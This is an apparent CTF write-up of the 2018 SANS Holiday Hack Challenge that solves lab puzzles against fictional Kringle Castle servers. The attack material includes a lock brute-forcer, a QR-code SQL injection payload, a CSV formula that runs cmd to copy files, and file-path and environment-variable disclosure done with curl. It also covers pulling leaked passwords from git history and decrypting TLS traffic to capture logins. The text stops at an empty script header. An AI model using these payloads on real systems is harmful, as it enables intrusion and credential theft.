           .kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx'                           
           xkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx;                             
          :olodxkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk;                               
       ..........;;;;coxkkkkkkkkkkkkkkkkkkkkkkc                                 
     ...................,',,:lxkkkkkkkkkkkkkd.                                  
     ..........................';;:coxkkkkk:                                    
        ...............................ckd.                                     
          ...............................                                       
                ...........................                                     
                   .......................                                      
                              ....... ...                                       
With gdb you fixed the race.
The other elves we did out-pace.
  And now they'll see.
  They'll all watch me.
I'll hang the bells on Santa's sleigh!


Congratulations! You've won, and have successfully completed this challenge.

For this one, we followed the SANS blog post from our badge hint almost verbatim, and were able to directly call the winnerwinner function.

1. START HERE

   To get into the Lobby, we have to, erm… get to talk to Santa, who is inside the gates. As we talk to him, he points us to a video we should start with:

   

   Figure 15: Santa Says START HERE

   As we watch that video, Ed Skoudis tells us the following things, which answer our questions:

   1. In 2015, the Dosis siblings asked for help understanding what piece of their "Gnome in Your Home" toy?

      At 4 minutes, 29 seconds:

      …and they extracted THE FIRMWARE. They extracted the firmware from their Gnome in their Home and then they did some analysis on it.

   2. In 2015, the Dosis siblings disassembled the conspiracy dreamt up by which corporation?

      At 4:52:

      And it turns out that the company that sold the gnomes was called ATNAS Corporation, A-T-N-A-S.

   3. In 2016, participants were sent off on a problem-solving quest based on what artifact that Santa left?

      At 9:03:

      So that's Santa's Business Card. The whole thing starts with the BUSINESS CARD. Because that's all that's left among all of the needles that are dropped from the tree right next to Santa's bag. Is that Santa's business card.

   4. In 2016, Linux terminals at the North Pole could be accessed with what kind of computer?

      At 16:26:

      Another really big hint for you is that Santa's elves provide hints, but you first need to solve some terminal challenges. So, the concept here is you go up to a terminal challenge, it's just a simple little CRANBERRY PI terminal. Wherever you see a cranberry pi on a terminal, click on that thing.

   5. In 2017, the North Pole was being bombarded by giant objects. What were they?

      At 9:19:

      In 2017, the Holiday Hack Challenge opens up with GIANT SNOWBALLS pouring down the mountain of the North Pole.

   6. In 2017, Sam the snowman needed help reassembling pages torn from what?

      At 9:54:

      You see, THE GREAT BOOK is this wonderful book that was shredded by an inter-dimensional tornado, and you have to fetch different pages of this book.

   Once we enter the correct answers, the screen changes:

   

   Figure 16: Kringle History Kiosk Answer

   Happy Trails

2. Open-Source Intel

   One of the coolest things about the Holiday Hack is that old versions remain up! Using the link that Bushy gave us, we can try past challenges, and read the official solutions and other winning entries.

   Year	Challenge	Winning Entries
   2017	Challenge	Answers
   2016	Challenge	Answers
   2015	Challenge	Answers

   1. In 2015, the Dosis siblings asked for help understanding what piece of their "Gnome in Your Home" toy?

      From reading the 2015 Challenge, we see:

      Now, Dear Reader, please help Jessica unwrap the secrets of the Gnome’s firmware by returning once again to the Dosis neighborhood. Find Jessica and she will provide you a copy of the Gnome’s firmware.

      Answer: Firmware

   2. In 2015, the Dosis siblings disassembled the conspiracy dreamt up by which corporation?

      From the 2015 Answers:

      Through the fine investigative work of over 500 officers and detectives here in this room, I am proud to announce that we have apprehended the mastermind behind the co-called “Gnome in Your Home” conspiracy. Miss Cindy Lou Who, age sixty-two, CEO of ATNAS Corporation, had planned a worldwide crime spree to destroy Christmas joy.

      Answer: ATNAS

   3. In 2016, participants were sent off on a problem-solving quest based on what artifact that Santa left?

      2016 was called "Santa's Business Card," so that's a good guess. Reading the 2016 challenge:

      And that, Dear Reader, is where you get involved. Take a close look at Santa's Business card.

      Answer: Business card

   4. In 2016, Linux terminals at the North Pole could be accessed with what kind of computer?

      Searching the 2016 challenge:

      Now, Dear Reader, scurry around the North Pole and retrieve all of the computer parts to build yourself a Cranberry Pi.

      Answer: Cranberry Pi

   5. In 2017, the North Pole was being bombarded by giant objects. What were they?

      The 2017 challenge starts:

      If I live to be a hundred, I'll never be able to forget the giant snowball disaster going on right now! The North Pole itself is under siege as boulder-sized snowballs cascade down our mountain, leaving destruction and mayhem in their wake.

      Answer: Snowballs

   6. In 2017, Sam the snowman needed help reassembling pages torn from what?

      Reading further:

      And if the snowballs aren't bad enough, the North Pole was hit last week with the worst Inter-Dimensional Tornado ever known, scrambling things up here pretty badly. Why, that blasted tornado even shredded The Great Book!

      What's that? You haven't heard of The Great Book? Why, it's a wonderful tome that describes the epic history of the elves. I gotta tell you, they revere that book, but now its pages are scattered all over the place! We need your help to find the missing seven pages of The Great Book so we can stitch this priceless relic back together.

      Answer: The Great Book

As we interact with the website, we're told that we missed the Call for Papers for the conference! We also see that there are two webpages we can access:

https://cfp.kringlecastle.com/ https://cfp.kringlecastle.com/cfp/cfp.html

The hints tell us to remove some characters from the end of the URL, as to view a directory listing. We discover that https://cfp.kringlecastle.com/cfp/ has directory listings enabled, and we see another file in that directory:

At this point, we just need to find the line with the talk we're looking for:

1. de Bruijn Sequences

   The key point from Tangle Coalbox is the bit about there being no start and stop. The door passcode is checked for each sequence of shapes as they are entered and shift from right to left. After the first four shapes are entered, a new passcode can be checked by entering just one more shape and for each shape after that.

   A de Bruijn algorithm generates a sequence of characters from a given "alphabet" (\(k\)) and "length" (\(n\)) where each sub-sequence only appears once. For this challenge, we simply convert each shape to a number 0-3, and run it through a de Bruijn algorithm.

   Doing so greatly speeds up the number of buttons we would need to press if we were entering this by hand. Brute-forcing this would mean that we would need to hit up to \(256 x 4 = 1024\) buttons. However, the de Bruijn sequence is only of length 259 (it wraps around, as the last digit could be followed by the first 3 digits of the sequence).

   Using the de Bruijn sequence generator provided in the hint from Tangle, we generate a sequence of 4 possibilities (\(k=4\)) and of length 4 (\(n=4\)). This generates the following sequence:

   0000100020003001100120013002100220023003100320033010102010301110
   1120113012101220123013101320133020203021102120213022102220223023
   1023202330303110312031303210322032303310332033311112111311221123
   1132113312121312221223123212331313221323133213332222322332323333
   

   We then simply try the possibilities, and quickly find our answer:

   

   Figure 19: de Bruijn sequences on the Door Lock

2. Brute Force

   By using the Developer Tools Network tab, we can see what's going on behind the scenes as we try a few codes in our browser:

   

   Figure 20: Door Lock HTTP GET requests

   Chrome's Developer Tools have a handy feature of copying the request as a curl command. After we press square, circle, triangle, square, our network request looks something like the following in curl:

   curl 'https://doorpasscode.kringlecastle.com/checkpass.php?i=1201&resourceId=92b948c2-882e-4dca-b5bc-8a15badd13e5' \
      -H 'Pragma: no-cache' \
      -H 'Accept-Encoding: gzip, deflate, br' \
      -H 'Accept-Language: en-US,en;q=0.9' \
      -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36' \
      -H 'Accept: */*' \
      -H 'Referer: https://doorpasscode.kringlecastle.com/?challenge=doorpasscode&id=92b948c2-882e-4dca-b5bc-8a15badd13e5' \
      -H 'Connection: keep-alive' \
      -H 'Cache-Control: no-cache' \
      --compressed
   

   This command outputs: {"success":false,"message":"Incorrect guess."}.

   We see that the first line includes the URL, and most of the other lines are headers that Chrome was setting.

   To figure out the right code, we can just replace the i parameter in the URL, and loop over all \(4^4 = 256\) options. There's no real benefit to calculating and using a de Bruijn sequence here, as each command will send a complete 4-character combination.

   #!/usr/bin/env python3
   # Brute force the door code. Finds the solution in 25 tries.
   
   import requests
   import itertools
   
   # The values sent to the server for each symbol
   symbols = {0: '<TRIANGLE>', 1: '<SQUARE>', 2: '<CIRCLE>', 3: '<STAR>'}
   search_space = itertools.product(list(symbols), repeat=4)
   
   for i in search_space:
       result = requests.get('https://doorpasscode.kringlecastle.com/checkpass.php?i=%i%i%i%i&resourceId=undefined' % i)
       if "true" in result.text:
           print("Code is ", end='')
           for symbol in i:
               print(symbols[symbol], end='')
           print(" (%i%i%i%i)" % i)
           exit(1)
   

   After a few seconds, we get our solution:

   Code is <TRIANGLE><SQUARE><CIRCLE><TRIANGLE> (0120)
   

   Interestingly and somewhat expected, the straight brute force code worked on the 25th try, which was slower than de Bruijn solution.

When we pull up the Git repository, we find a project called "santas_castle_automation." Our first hurdle is retrieving the encrypted ZIP file. The GitLab site has a "Find File" button on the right side of the page. Searching for zip yields:

ventilation_diagram.zip catches our attention, so we download that from the website. Is this the encrypted ZIP file which we seek? Trying to open it prompts us for a password, so it seems likely that we've found it. Viewing the history and the commit where this file was added also reveals the following comment:

As we skim over the README that's displayed as we scroll down, we see the following message from Shinny:

We all get what we git, then we git what we've got.
When we're full of old pulls, then we're holding a lot.
Do you wonder what happens to things that we thought,
Were too private then trampled with things that were not?

I assume that our secrets are gone from the cloud.
They still sit here in local reposit'ries' shroud,
But I heard that old Redberry was rather wowed,
When she found out her keys were exposed - wasn't proud.

So when I found that I had thown creds with a push,
Pretty sure I did stomp them with clean files - smoosh!
If you find an old password 'neath folder or bush,
Would you kindly play nice and say nothing - just shush?"

This, combined with the hint, strongly suggest that there are some secrets hidden in this repository. We've never tried Trufflehog before. Following along in Brian's video, we can try the command from the Trufflehog's README.

$ pip install truffleHog
Collecting truffleHog
  Downloading https://files.pythonhosted.org/packages/6a/30/efbdeb399c543b052c31c05fa7dab78cd6d02d26934c087b83adb1b83c93/truffleHog-2.0.98-py2.py3-none-any.whl
Requirement already satisfied: GitPython==2.1.1 in /usr/local/lib/python2.7/site-packages (from truffleHog) (2.1.1)
Requirement already satisfied: truffleHogRegexes==0.0.7 in /usr/local/lib/python2.7/site-packages (from truffleHog) (0.0.7)
Requirement already satisfied: gitdb2>=2.0.0 in /usr/local/lib/python2.7/site-packages (from GitPython==2.1.1->truffleHog) (2.0.5)
Requirement already satisfied: smmap2>=2.0.0 in /usr/local/lib/python2.7/site-packages (from gitdb2>=2.0.0->GitPython==2.1.1->truffleHog) (2.0.5)
Installing collected packages: truffleHog
Successfully installed truffleHog-2.0.98
$ truffleHog --regex --entropy=False https://git.kringlecastle.com/Upatree/santas_castle_automation.git
~~~~~~~~~~~~~~~~~~~~~
Reason: RSA private key
Date: 2018-12-11 02:29:03
Hash: 6e754d3b0746a8e980512d010fc253cbb7c23f52
Filepath: schematics/files/dot/ssh/key.rsa
Branch: origin/master
Commit: cleaning files
-----BEGIN RSA PRIVATE KEY-----
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
Reason: RSA private key
Date: 2018-12-11 01:25:21
Hash: c376f995b44caf502992ddb617a34e7d38d7bbc1
Filepath: schematics/files/dot/ssh/key.rsa
Branch: origin/master
Commit: support files for Santa's drone functions

-----BEGIN RSA PRIVATE KEY-----
~~~~~~~~~~~~~~~~~~~~~

Interesting… some private SSH keys. The top commit catches our eye, as the message is "cleaning files." Could this be what Shinny was talking about, when he said "So when I found that I had thown creds with a push, Pretty sure I did stomp them with clean files - smoosh!?"

No passwords, though. The video continues to mention the second command from the README, so let's try that. The README states that the first command we ran cuts down on the noise, but as we haven't found the password yet, we'll expand the search:

$ truffleHog https://git.kringlecastle.com/Upatree/santas_castle_automation.git
...
Reason: High Entropy
Date: 2018-12-11 01:16:57
Hash: 0dfdc124b43a4e7e1233599c429c0328ec8b01ef
Filepath: schematics/for_elf_eyes_only.md
Branch: origin/master
Commit: important update

@@ -1,15 +0,0 @@
-Our Lead InfoSec Engineer Bushy Evergreen has been noticing an increase of brute force attacks in our logs. Furthermore, 
-Albaster discovered and published a vulnerability with our password length at the last Hacker Conference.
-
-Bushy directed our elves to change the password used to lock down our sensitive files to something stronger. Good thing 
- he caught it before those dastardly villians did!
-
-
-Hopefully this is the last time we have to change our password again until next Christmas.
-
-
-
-
-Password = 'Yippee-ki-yay'
-
-
-Change ID = '9ed54617547cfca783e0f81f8dc5c927e3d1e3'
-

~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
Reason: High Entropy
Date: 2018-12-11 01:14:41
Hash: c61af60810e77c8b91c8d29c1303da4bfefde66b
Filepath: sysctl/metadata.json
Branch: origin/master
Commit: Santa's Castle ICS
...

This finds a lot of hits, but the second from the last commit catches our eye. The filepath is schematics/for_elf_eyes_only.md, and there's a line:

Password = 'Yippee-ki-yay'

Trying to open the ZIP file again, we enter that password and discover maps of the ventilation system!

To start, we download and run the VM.

When the VM launches, we're in a Slingshot Linux instance. We notice a shortcut to Bloodhound on the desktop:

When we launch Bloodhound, we open up a dataset for AD.KRINGLECASTLE.COM. Because Bloodhound is already installed, and the data is pre-imported for us, we can skip ahead in the video that Holly linked us to (around the 4:27 mark). We learn that the quickest way to get started is to explore the Queries tab. Our task is to find a path from a Kerberoastable user to the Domain Admins group. As we scroll down the Pre-Built Analytics Queries list, we see that there's a query for almost exactly that:

We see a few options, and a few paths. Our objective tells us one further thing: "Remember to avoid RDP as a control path as it depends on separate local privilege escalation flaws."

As we explore Bloodhound's interface, we find an Edge Filter option, and we can disable "CanRDP."

This provides us with the following graph:

It looks like our answer is Leanne Dubej's user:

But what does this graph mean?

1. Leanne (LDUBEJ00320) is a member of the IT_00332 Active Directory group.
2. That group has Administrator privileges on the COMP00185 system.
3. Jena (JETAK00084) has an active session on the COMP00185 system.
4. Jena is a Domain Administrator.

Administrators have unfettered access to a system. One of their superpowers is to be able to steal access tokens from other users on that system, and impersonate them. Because Jena has an active session on a system that Leanne is an admin on, Leanne could steal Jena's token, and use it to perform actions as a domain admin.

The other remaining question is what exactly is meant by a "Kerberoastable" user? Kerberoast is "a series of tools for attacking MS Kerberos implementations." If an account has a Service Principal Name (SPN) associated with it, it's vulnerable to offline cracking attacks. Kerberoastable users are simply users that have SPNs associated with their accounts. In our case, Leanne has an SPN, and if we use Kerberoast to access her account, Bloodhound has found a path for us to elevate all the way to Domain Admin.

Clicking on the Scan-O-Matic brings up the following interface:

As we interact with the scanner, we see there are two things we can do: scan our fingerprint, or plug in a USB 3.0 drive. Scanning our fingerprint processes the still from the video camera, while the USB drive brings up a file selection window for a file upload.

The objective also gave us a sample employee badge:

First thing we try is uploading the badge via the file upload functionality. No dice:

That's fine. We can do some file conversion, either by "Save As…" or from the command line: convert alabaster_badge.jpg alabaster_badge.png. Now we're uploading the right format:

Perhaps Alabaster's access was revoked when he reported his badge as stolen. These elves are really on top of security…

Pepper's hints are pointing us towards SQL injection via the QR code, so let's start by taking a closer look at the QR code on Alabaster's badge. The Creating QR barcodes website she provided also has a scan function (as do many cellphone camera apps). We ended up using a different site, as we can just link to Alabaster's badge URL, and we don't have to use our webcam. The results are fairly cryptic, but they do seem to be plain text:

Decode Succeeded

Raw text	        oRfjg5uGHmbduj2m

Raw bytes          41 06 f5 26 66 a6 73 57   54 74 86 d6 26 47 56 a3
		   26 d0 ec 

Barcode format	QR_CODE
Parsed Result Type	TEXT
Parsed Result	oRfjg5uGHmbduj2m

As we turn our attention to the OWASP link she mentioned, we see this interesting looking snippet:

We can use the Creating QR barcodes website to create a new QR code, with the snippet provided or 1-- -' or 1 or '1"or 1 or", and then save it (making sure to save it as a PNG). Now we can upload our new code to the Scan-O-Matic:

Same error. But, this wasn't a total failure. We've confirmed that we can send arbitrary text as a QR code. Let's take a step back, and simplify our injection attempt. The OWASP webpage has several good examples, but let's just send the simplest case: '.

EXCEPTION AT (LINE 96 "user_info = 
  query("SELECT first_name,last_name,enabled FROM employees WHERE 
	 authorized = 1 AND uid = '{}' LIMIT 1".format(uid))"):
(1064, u"You have an error in your SQL syntax; check the manual 
	 that corresponds to your MariaDB server version for the 
	 right syntax to use near '''' LIMIT 1' at line 1")"

The error is hard to read as it scrolls across, but we can use the Network Developer Tools tab to view the whole thing. Still, it's hard to parse, so we'll take a closer look. It's an error from the MariaDB (née MySQL) database server. We also see a code snippet from Scan-O-Matic:

query("SELECT first_name,last_name,enabled FROM employees WHERE 
       authorized = 1 AND uid = '{}' LIMIT 1".format(uid))"

From this, we can figure out the database query was something like:

SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = '$QR_UID' LIMIT 1

The QR code seems to supply the uid parameter (this is the only variable on that line; everything else is hard-coded). When we submitted a uid of just a single-quote, the SQL database server complained of a syntax error. Let's play around with this a little bit, to better understand what's going on. A good tool for this is sqltest.net. From the query, we know that we're searching the employees table. The query is requesting the fields first_name, last_name, enabled be returned, and it's filtering on the fields authorized and uid. So we can mock up a simple example (in fact the example when we load sqltest.net already is pretty close, as it has id, first_name, and last_name).

CREATE TABLE employees
(
      uid        VARCHAR(30), 
      first_name VARCHAR(30),
      last_name  VARCHAR(30),
      authorized INT,
      enabled    INT
); 

-- We have the UID from Alabaster's badge, and we know he's been disabled
INSERT INTO `employees` 
    (`uid`, `first_name`, `last_name`, `authorized`, `enabled`) 
VALUES 
    ('oRfjg5uGHmbduj2m', 'Alabaster', 'Snowball', 1, 0);

-- We create an employee who is authorized and enabled
INSERT INTO `employees` 
    (`uid`, `first_name`, `last_name`, `authorized`, `enabled`) 
VALUES
    ('good_uid', 'Pepper', 'Minstix', 1, 1);

We decided to make the authorized and enabled fields integers because the query has authorized = 1. The lack of quotes tells us it's not a string.

We'll start by trying our query with the UID from Alabaster's badge: SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = 'oRfjg5uGHmbduj2m' LIMIT 1;:

We got our expected result, but Alabaster's not enabled. Now let's try sending a single quote, and see if we can duplicate the error message:

We get the following error message, which matches almost exactly the error message we got from Scan-O-Matic: =You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' LIMIT 1' at line 2=. The cause of the error is that we've created a query with a string that doesn't close (there's no closing single-quote).

We've discovered a SQL injection! Now we need to exploit it to gain access to the door. We start by trying the following query:

SELECT first_name,last_name,enabled FROM employees 
  WHERE authorized = 1 AND uid = '' OR uid != '' LIMIT 1;

We're looking for an authorized user, whose uid is either empty or not empty. In other words, this should match everyone.

Well, no more error, but we still only get Alabaster's user. Even though our search should match everyone, the LIMIT 1 clause will only return one result, and just our luck, that one result is not enabled. No problem – we can just also require that the user be enabled:

SELECT first_name,last_name,enabled FROM employees 
  WHERE authorized = 1 AND uid = '' OR enabled = 1 OR uid = '' LIMIT 1;

This query seems a bit repetitive, and it is, because we're limited in what queries we can build. What we're searching on is that a user must have an empty uid OR be enabled OR have an empty uid. We're not sure if anyone has an empty uid, but the user that's returned matches the other criteria: their account is enabled.

We found a query which works in our little sandbox, but how do we make it work on Scan-O-Matic? We start by comparing the queries:

-- Scan-O-Matic:
SELECT first_name,last_name,enabled FROM employees
 WHERE authorized = 1 AND uid = '$QR_UID' LIMIT 1;

-- Our query:
SELECT first_name,last_name,enabled FROM employees 
  WHERE authorized = 1 AND uid = '' OR enabled = 1 OR uid = '' LIMIT 1;

The UID from the QR code gets put in between single quotes, which is why our query was rather odd. We needed to construct it in such a way so that it would both start and end with a string.

So, if we just set the uid parameter to ' OR enabled = 1 OR uid =', we should be able to run this query on Scan-O-Matic:

Bringing up the webpage, we're presented with a simple form:

Filling in the form, the page forces us to attach a file before submitting. If we do that, we receive the following message:

Both the objective and the submission message told us the file we need to retrieve, C:\candidate_evaluation.docx. We next simply tried https://careers.kringlecastle.com/candidate_evaluation.docx, and got the following:

What a helpful error message! Unfortunately, trying https://careers.kringlecastle.com/public/candidate_evaluation.docx similarly doesn't work. But now, we know two critical pieces of information:

1. We're trying to access C:\candidate_evaluation.docx
2. Files in C:\careerportal\resources\public\ are publicly accessible via the web server.

Time to turn our attention to the hints, and see how we can get our target file into the public directory. Brian's talk gives some guidance on how to build a CSV to execute an arbitrary command. We choose a name designed to not conflict with other KringleCon attendees.

=cmd|'/C copy C:\\candidate_evaluation.docx C:\\careerportal\\resources\\public\\ZXNuZXRfc2VjdXJpdHkK.docx'!A0

Uploading this file, we then try to access https://careers.kringlecastle.com/public/ZXNuZXRfc2VjdXJpdHkK.docx. After ~10-15 seconds, we download a Word Doc. The download evaluates 4 elves, including Krampus:

The document reveals that Krampus is connected to cyber terrorist organization Fancy Beaver (a play on the Fancy Bear APT group).

Answer:

A lot of hints on this one. We start by loading up Packalyzer, and trying to find the HTML comments. We have access to two pages initially, the home page, and the new user registration page. We can't find any hidden comments in either one, so we go ahead and register a new user, and then sign in with our new account.

At this point, the Packalyzer allows us to sniff 20 seconds of traffic, and then download the PCAP.

Once we're authenticated, we can find the following comment in the page source:

//File upload Function. All extensions and sizes are validated server-side in app.js
$(function () {
    'use strict';
    $('#fileupload').fileupload({

https://packalyzer.kringlecastle.com/app.js doesn't work, but we also noticed some resources being loaded from https://packalyzer.kringlecastle.com/pub/, and we can recover the server-side source code of app.js from https://packalyzer.kringlecastle.com/pub/app.js

Folllowing SugarPlum's hints, we found the comment, and grabbed the server-side source code sitting in the web root. Now we need to identify the environment variables used to store SSL keys:

const dev_mode = true;
const key_log_path = ( !dev_mode || __dirname + process.env.DEV + process.env.SSLKEYLOGFILE )
const options = {
  key: fs.readFileSync(__dirname + '/keys/server.key'),
  cert: fs.readFileSync(__dirname + '/keys/server.crt'),
  http2: {
    protocol: 'h2',         // HTTP2 only. NOT HTTP1 or HTTP1.1
    protocols: [ 'h2' ],
  },
  keylog : key_log_path     //used for dev mode to view traffic. Stores a few minutes worth at a time
};

Let's take this line by line. In the development copy we have, dev_mode is set to true. key_log_path uses some short-hand syntax, which could also be written as:

if ( dev_mode )
    const key_log_path = __dirname + process.env.DEV + process.env.SSLKEYLOGFILE;

Finally, once key_log_path is set, the comment tells us that it's used to view traffic. Our hints seem to point us to recovering this file, and then using it to decrypt the traffic. Perhaps the file was left over from development. We need to figure out what the environment variables DEV and SSLKEYLOGFILE were set to.

The main logic of the file is the router.get function. An annotated version is:

//Route for anything in the public folder except index, home and register
router.get(env_dirs,  async (ctx, next) => {
    try {
        var Session = await sessionizer(ctx);

        // Splits the web path into an array delimited by /
        // e.g. /pub/dir/../file -> ["pub", "dir", "..", "file"]
        let split_path = ctx.path.split('/').clean("");

        //Grabs directory which should be first element in array
        // e.g. ["pub", "dir", "..", "file"] -> "PUB"
        let dir = split_path[0].toUpperCase();

        // Removes the first element of the array
        // e.g. ["pub", "dir", "..", "file"] -> ["dir", "..", "file"]
        split_path.shift();

        // e.g. ["dir", "..", "file"] -> "/dir/../file"
        let filename = "/" + split_path.join('/');

        // This removes any instances of ".." to prevent path traversal attacks
        // e.g. "/dir/../file" -> "/dir//file"
        while (filename.indexOf('..') > -1) {
            filename = filename.replace(/\.\./g,'');
        }

        // Only execute if the filename is not 'index.html', 'home.html', or 'register.html'
        if (!['index.html', 'home.html', 'register.html'].includes(filename)) {
            // Build the filename, and set the content type header accordingly
            ctx.set('Content-Type', mime.lookup(__dirname + (process.env[dir] || '/pub/') + filename))
            // Read the file, and send it as the body
            ctx.body = fs.readFileSync(__dirname + (process.env[dir] || '/pub/') + filename)
        }
        // For 'index.html', 'home.html', or 'register.html', return a 404 instead.
        else
        {
            ctx.status = 404;
            ctx.body = 'Not Found';
        }
    // If anything we've tried so far generated an error, return that error as the body
    } catch (e) {
        ctx.body = e.toString();
    }
});

Going through this, especially with an example, we can understand the logic. Sometimes it's useful to try running a command, and seeing what the output is. In cases like this, we pull up the Javascript console of our browser's developer tools again:

Our attention is drawn to how the code builds the filename:

ctx.body = fs.readFileSync(__dirname + (process.env[dir] || '/pub/') + filename)

Again, we'll expand this logic out a bit:

// e.g. ["pub", "dir", "..", "file"] -> "PUB"
let dir = split_path[0].toUpperCase();

if ( process.env[dir] )
    var dir = process.env[dir];
else
    var dir = '/pub/';

ctx.body = fs.readFileSync(__dirname + dir + filename)

So, the first part of our path is upper-cased, and if an environment variable exists with that name, it attempts to use that as part of the path to our file. Let's try it. Searching for process.env pulls up some Node.js documentation:

Let's try accessing the PATH environment variable:

$ curl -s 'https://packalyzer.kringlecastle.com/path/file'
Error: ENOENT: no such file or directory, open '/opt/http2/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin/file'

We received an error message, but one which discloses some information. Let's try to unpack this, given that we have the source for how the filename was built. First, let's identify exactly which part is our PATH. We can check this on a Cranberry Pi terminal, as a point of comparison:

elf@cranpi:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Reading our error message carefully, we can identify all three variables that combined to form the filename:

At this point, we need to recover the environment variables DEV and SSLKEYLOGFILE, which are referenced in key_log_path = __dirname + process.env.DEV + process.env.SSLKEYLOGFILE ):

$ curl -s 'https://packalyzer.kringlecastle.com/dev/file'
Error: ENOENT: no such file or directory, open '/opt/http2/dev//file'
$ curl -s 'https://packalyzer.kringlecastle.com/sslkeylogfile/file'
Error: ENOENT: no such file or directory, open '/opt/http2packalyzer_clientrandom_ssl.log/file'

From this, we can deduce that DEV is /dev/ and SSLKEYLOGFILE is packalyzer_clientrandom_ssl.log. We've already figured out __dirname, so our key_log_path would've been /opt/http2/dev/packalyzer_clientrandom_ssl.log. We just need to figure out how to access that via the webserver. We've already noted that we can access files from https://packalyzer.kringlecastle.com/pub/, so let's get the full path of that by generating an error message for a non-existant file:

curl -s 'https://packalyzer.kringlecastle.com/pub/passwords'
Error: ENOENT: no such file or directory, open '/opt/http2/pub//passwords'

Great! The files we're accessing are from /opt/http2/pub, so /opt/http2/dev should be just as easy to access:

$ curl -sv -o packalyzer_clientrandom_ssl.log 'https://packalyzer.kringlecastle.com/dev/packalyzer_clientrandom_ssl.log'
...
< HTTP/2 200
< set-cookie: PASESSION=6184281170062926003382193748323381
< content-type: text/plain
< content-length: 38896
< date: Sun, 13 Jan 2019 17:32:29 GMT
<
{ [16384 bytes data]

Great! We've successfully downloaded the file.

We've run through most of SugarPlum's hints in order to recover the SSL Key Logfile. As a reminder, she also told us:

I'm hoping these errors can't be used to compromise SSL on the website and steal logins.

On a tooootally unrelated note, have you seen the HTTP2 talk at at KringleCon by the Chrises? I never knew HTTP2 was so different!

We already used Chris Elgee's video for the CURLing Master terminal, and it made no mention of using HTTP2 to compromise SSL. The other video is Chris Davis, HTTP/2: Decryption and Analysis in Wireshark, which sounds perfect.

The first part of the talk discusses how to create the SSL Key Logfile using curl and Chrome. This seems like what we just recovered from the system, only that it was generated server-side instead of client-side. The talk also mentions how we can use this file to decrypt the SSL traffic in Wireshark. In order to do that, we need a PCAP, though. Perhaps a new PCAP from the Packalyzer web interface?

The comment in the server-side source code warned us that the key log only stores a few minutes worth at a time. The server can't log keys ahead of time, so our workflow should be:

1. Sniff traffic on Packalyzer, to generate a new PCAP.
2. Download the SSL key logfile
3. Download the capture
4. Attempt to decrypt the SSL traffic in the capture with the key logfile.

For step 4, we just continue following along with Chris's video. First, we configure the Wireshark SSL protocol analyzer to use our freshly downloaded key logfile:

It worked! We can now see some HTTP2 traffic:

As a reminder, our goal is to steal logins, and ultimately access a document sent from Holly to Alabaster. To start, we'll filter out just HTTP2 traffic, using the http2 display filter:

We immediately see a HTTP POST request to /api/login, which seems promising. Chris's video has a very similar request, and he points out that to get the actual username and password, we need to look at a different frame in the packet capture. We'll combine two of Chris's example filters into http2.header.value == "POST" or http2.data.data, and then we can find some credentials:

We've found Pepper's credentials. Can we find anyone else's? To speed up this analysis a bit, we're going to add some custom fields to the Wireshark display. Either by right-clicking on the column headers and going to Column Preferences... or by going to Preferences → Appearance → Columns. We'll add two custom columns for JSON keys and values:

Finally, we'll filter our PCAP to display frames which have a JSON key of "password":

Bingo!

We've followed all the hints, but ultimately, we're looking for a document. The HTTP2 traffic we're seeing in this PCAP looks like the Packalyzer website itself, so we're presuming the credentials are for that. Since we know the document was sent to Alabaster, let's start with his credentials, and try logging into Packalyzer:

Opening up the captures associated with Alabaster's account, we find the tantalizingly named super_secret_packet_capture.pcap. We'll grab it and open it up in Wireshark again. A good way to get a quick overview of a PCAP in Wireshark is to use Statistics → Protocol Hierarchy:

It looks like the only thing Wireshark found in this PCAP is SMTP (e-mail) traffic. Note that it's not listed as 100%, since some packets are simply TCP control packets. We'll filter on smtp:

We immediately see an e-mail from Holly to Alabaster. Looks like we're on the right track… Now we just need to find and extract the document. To get a better look at the data, we can right click on one of the frames, and select Follow → TCP Stream. A new window pops up:

Holly says:

Hey alabaster,

Santa said you needed help understanding musical notes for accessing the vault. He said your favorite key was D. Anyways, the following attachment should give you all the information you need about transposing music.

What follows is the attachment:

------=_MIME_BOUNDARY_000_11181
Content-Type: application/octet-stream
Content-Transfer-Encoding: BASE64
Content-Disposition: attachment

JVBERi0xLjUKJb/3ov4KOCAwIG9iago8PCAvTGluZWFyaXplZCAxIC9MIDk3ODMxIC9IIFsgNzM4
IDE0MCBdIC9PIDEyIC9FIDc3MzQ0IC9OIDIgL1QgOTc1MTcgPj4KZW5kb2JqCiAgICAgICAgICAg

We can see that the attachment is encoded as base64, so we can copy and paste the data, and then decode it with:

$ cat obj8_attachment.b64 | base64 --decode > obj8_attachment
$ file obj8_attachment
obj8_attachment: PDF document, version 1.5
$ mv obj8_attachment obj8_attachment.pdf

The attachment is a PDF, so we'll rename it accordingly. Opening the document gives us our answer:

Answer:

We also note that this document walks us through how to transcribe a song from one key to another.

We take the notes recovered from Alabaster's decrypted password vault, and try it on the piano lock. The document we recovered from Packalyzer helpfully shows us the notes on the piano keys.

The hint tells us that it should be in the key of D, not E. The Packalyzer document also told us how to transcribe music from one key to another. Let's try:

Trying that sequence (DC#DC#DDC#DEF#EF#GAG#AG#A) reveals:

Once we enter the vault, Alabaster tells us:

Of course I transposed it it before I entered it into my database for extra security.

Hans offers us a congratulations, and Santa explains the whole thing, finishing:

You did such a GREAT job! And remember what happened to the people who suddenly got everything they ever wanted?

They lived happily ever after.

So, who was behind it all?

Answer:

After learning about de Bruijn sequences, we were curious if that would work here. The lock seemed to operate in the same way, as it would try unlocking after each note was pressed. We noticed that the tune in question had a similar note pattern at the end (AG#AG#A) as at the beginning (DC#DC#D). We whipped up a quick Python program that verified that in fact we could generate a de Bruijn sequence.

#!/usr/bin/env python

